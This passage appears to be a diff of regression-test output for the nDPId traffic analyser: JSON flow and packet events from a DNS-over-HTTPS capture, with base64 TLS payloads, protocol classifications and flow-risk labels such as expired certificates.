MvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"}
-00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"}
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 03216{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="}
-00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="}
-01194{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9":"TLS Expired Certificate"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9":"TLS Expired Certificate"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9":"TLS Expired Certificate"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9":"TLS Expired Certificate"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
